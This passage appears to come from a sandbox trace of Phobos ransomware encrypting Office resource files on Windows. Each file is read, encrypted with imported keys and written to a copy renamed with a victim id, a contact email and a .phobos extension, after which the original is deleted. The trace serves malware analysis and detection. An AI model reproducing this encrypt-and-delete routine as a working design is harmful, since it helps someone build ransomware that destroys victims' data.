dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.439] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.439] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.440] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.440] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.440] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.440] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2b60, lpOverlapped=0x0) returned 1 [0166.478] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2b70, dwBufLen=0x2b70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2b70) returned 1 [0166.478] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2b70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2b70, lpOverlapped=0x0) returned 1 [0166.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0166.479] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.479] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.479] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.479] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.479] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.479] CloseHandle (hObject=0x130) returned 1 [0166.479] CloseHandle (hObject=0x17c) returned 1 [0166.479] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll")) returned 1 [0166.480] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.480] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.480] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=107360) returned 1 [0166.481] CloseHandle (hObject=0x17c) returned 1 [0166.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll")) returned 0x2020 [0166.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.481] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.481] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.482] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.482] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.482] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1a360, lpOverlapped=0x0) returned 1 [0166.599] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a370, dwBufLen=0x1a370 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a370) returned 1 [0166.600] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a370, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a370, lpOverlapped=0x0) returned 1 [0166.602] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0166.602] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.602] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.602] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.602] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.603] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.603] CloseHandle (hObject=0x17c) returned 1 [0166.603] CloseHandle (hObject=0x130) returned 1 [0166.603] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll")) returned 1 [0166.604] SetEvent (hEvent=0xe8) returned 1 [0166.604] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.604] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.604] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=371552) returned 1 [0166.604] CloseHandle (hObject=0x130) returned 1 [0166.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll")) returned 0x2020 [0166.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.605] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.605] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.605] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.605] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.605] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.605] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.605] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5ab60, lpOverlapped=0x0) returned 1 [0166.667] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5ab70, dwBufLen=0x5ab70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5ab70) returned 1 [0166.670] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5ab70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5ab70, lpOverlapped=0x0) returned 1 [0166.675] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0166.675] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.676] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.676] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.676] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.676] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.676] CloseHandle (hObject=0x130) returned 1 [0166.676] CloseHandle (hObject=0x17c) returned 1 [0166.676] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll")) returned 1 [0166.680] SetEvent (hEvent=0xe8) returned 1 [0166.682] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.682] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0166.683] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=13152) returned 1 [0166.683] CloseHandle (hObject=0x148) returned 1 [0166.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll")) returned 0x2020 [0166.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.683] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0166.683] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.684] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.684] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.684] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0166.684] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.684] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3360, lpOverlapped=0x0) returned 1 [0166.767] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3370, dwBufLen=0x3370 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3370) returned 1 [0166.767] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3370, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3370, lpOverlapped=0x0) returned 1 [0166.768] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32da8) returned 1 [0166.768] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.768] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.768] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.768] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.768] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0166.768] CloseHandle (hObject=0x148) returned 1 [0166.768] CloseHandle (hObject=0x17c) returned 1 [0166.768] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll")) returned 1 [0166.769] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.769] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.770] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=26976) returned 1 [0166.770] CloseHandle (hObject=0x17c) returned 1 [0166.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll")) returned 0x2020 [0166.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.770] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.770] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0166.770] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0166.770] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.770] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x6960, lpOverlapped=0x0) returned 1 [0166.789] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6970, dwBufLen=0x6970 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6970) returned 1 [0166.789] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6970, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x6970, lpOverlapped=0x0) returned 1 [0166.791] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0166.791] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.791] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.791] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.791] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.791] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0166.791] CloseHandle (hObject=0x17c) returned 1 [0166.791] CloseHandle (hObject=0x148) returned 1 [0166.791] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll")) returned 1 [0166.792] SetEvent (hEvent=0xe8) returned 1 [0166.792] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.792] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0166.792] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=154464) returned 1 [0166.793] CloseHandle (hObject=0x148) returned 1 [0166.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll")) returned 0x2020 [0166.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0166.793] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.793] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0166.793] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.793] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x25b60, lpOverlapped=0x0) returned 1 [0167.229] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x25b70, dwBufLen=0x25b70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x25b70) returned 1 [0167.231] WriteFile (in: 